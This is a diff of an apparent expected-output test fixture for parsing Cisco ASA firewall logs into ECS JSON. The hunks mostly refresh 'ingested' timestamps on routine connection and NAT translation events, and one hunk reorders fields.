@@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099724100Z", + "ingested": "2021-12-14T14:39:19.188491669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099728400Z", + "ingested": "2021-12-14T14:39:19.188492054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099734100Z", + "ingested": "2021-12-14T14:39:19.188492437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099739700Z", + "ingested": "2021-12-14T14:39:19.188492816Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099745700Z", + "ingested": "2021-12-14T14:39:19.188493437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", 
@@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099753700Z", + "ingested": "2021-12-14T14:39:19.188493843Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099759600Z", + "ingested": "2021-12-14T14:39:19.188494232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099765100Z", + "ingested": "2021-12-14T14:39:19.188494612Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099770800Z", + "ingested": "2021-12-14T14:39:19.188495272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099776400Z", + "ingested": "2021-12-14T14:39:19.188495662Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", 
@@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099781900Z", + "ingested": "2021-12-14T14:39:19.188496055Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099787400Z", + "ingested": "2021-12-14T14:39:19.188496435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099793Z", + "ingested": "2021-12-14T14:39:19.188496822Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099798500Z", + "ingested": "2021-12-14T14:39:19.188497208Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099804100Z", + "ingested": "2021-12-14T14:39:19.188497720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", 
@@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099832200Z", + "ingested": "2021-12-14T14:39:19.188498844Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099838100Z", + "ingested": "2021-12-14T14:39:19.188499244Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099842800Z", + "ingested": "2021-12-14T14:39:19.188499637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099846500Z", + "ingested": "2021-12-14T14:39:19.188500021Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099851100Z", + "ingested": "2021-12-14T14:39:19.188500403Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", 
@@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099856600Z", + "ingested": "2021-12-14T14:39:19.188500917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099861600Z", + "ingested": "2021-12-14T14:39:19.188501305Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099867600Z", + "ingested": "2021-12-14T14:39:19.188501683Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099872Z", + "ingested": "2021-12-14T14:39:19.188502067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099876400Z", + "ingested": "2021-12-14T14:39:19.188502465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", 
@@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099896Z", + "ingested": "2021-12-14T14:39:19.188502846Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099900700Z", + "ingested": "2021-12-14T14:39:19.188503305Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099906400Z", + "ingested": "2021-12-14T14:39:19.188503694Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099912100Z", + "ingested": "2021-12-14T14:39:19.188504086Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099939700Z", + "ingested": "2021-12-14T14:39:19.188504476Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", 
@@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099945700Z", + "ingested": "2021-12-14T14:39:19.188504870Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099951700Z", + "ingested": "2021-12-14T14:39:19.188505287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099957600Z", + "ingested": "2021-12-14T14:39:19.188505669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099963500Z", + "ingested": "2021-12-14T14:39:19.188506052Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099969400Z", + "ingested": "2021-12-14T14:39:19.188506434Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", 
@@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099990900Z", + "ingested": "2021-12-14T14:39:19.188506819Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099994700Z", + "ingested": "2021-12-14T14:39:19.188507226Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099999200Z", + "ingested": "2021-12-14T14:39:19.188507616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100004200Z", + "ingested": "2021-12-14T14:39:19.188508004Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100009100Z", + "ingested": "2021-12-14T14:39:19.188508392Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", 
@@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100014700Z", + "ingested": "2021-12-14T14:39:19.188508771Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100018900Z", + "ingested": "2021-12-14T14:39:19.188509161Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100023Z", + "ingested": "2021-12-14T14:39:19.188509552Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100026500Z", + "ingested": "2021-12-14T14:39:19.188510122Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100030800Z", + "ingested": "2021-12-14T14:39:19.188510513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", 
@@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100036400Z", + "ingested": "2021-12-14T14:39:19.188510911Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:34:28.100042Z", + "ingested": "2021-12-14T14:39:19.188511316Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100047800Z", + "ingested": "2021-12-14T14:39:19.188511721Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100053400Z", + "ingested": "2021-12-14T14:39:19.188512193Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100059Z", + "ingested": "2021-12-14T14:39:19.188512663Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100064500Z", + "ingested": "2021-12-14T14:39:19.188513054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100070100Z", + "ingested": "2021-12-14T14:39:19.188513442Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100075600Z", + "ingested": "2021-12-14T14:39:19.188513833Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", 
@@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100102900Z", + "ingested": "2021-12-14T14:39:19.188514225Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100109Z", + "ingested": "2021-12-14T14:39:19.188514629Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100114900Z", + "ingested": "2021-12-14T14:39:19.188515019Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100120800Z", + "ingested": "2021-12-14T14:39:19.188515409Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100126600Z", + "ingested": "2021-12-14T14:39:19.188515799Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", 
@@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100131800Z", + "ingested": "2021-12-14T14:39:19.188516311Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100136700Z", + "ingested": "2021-12-14T14:39:19.188516696Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100158500Z", + "ingested": "2021-12-14T14:39:19.188517103Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100164200Z", + "ingested": "2021-12-14T14:39:19.188517513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100187400Z", + "ingested": "2021-12-14T14:39:19.188517899Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", 
@@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100192Z", + "ingested": "2021-12-14T14:39:19.188518348Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100196400Z", + "ingested": "2021-12-14T14:39:19.188518790Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100201Z", + "ingested": "2021-12-14T14:39:19.188519180Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100205200Z", + "ingested": "2021-12-14T14:39:19.188519560Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100210400Z", + "ingested": "2021-12-14T14:39:19.188520588Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", 
@@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100232500Z", + "ingested": "2021-12-14T14:39:19.188520991Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100238300Z", + "ingested": "2021-12-14T14:39:19.188521394Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100243800Z", + "ingested": "2021-12-14T14:39:19.188521780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100249400Z", + "ingested": "2021-12-14T14:39:19.188522164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100255Z", + "ingested": "2021-12-14T14:39:19.188522576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", 
